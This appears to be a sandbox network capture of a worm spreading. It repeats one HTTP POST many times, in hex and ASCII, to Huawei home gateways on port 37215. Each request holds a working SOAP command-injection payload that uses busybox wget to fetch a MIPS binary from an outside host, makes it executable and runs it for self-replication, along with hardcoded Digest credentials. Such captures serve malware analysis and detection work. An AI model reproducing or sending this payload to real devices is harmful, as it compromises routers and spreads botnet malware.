                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:18.253194094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:18.681056976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:19.545046091 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:21.240951061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:24.600873947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:31.512882948 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1927192.168.2.1547318185.35.197.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020389080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1928192.168.2.1537968197.195.221.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020412922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1929192.168.2.153889041.138.142.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020441055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1930192.168.2.1534240197.12.91.25037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020486116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
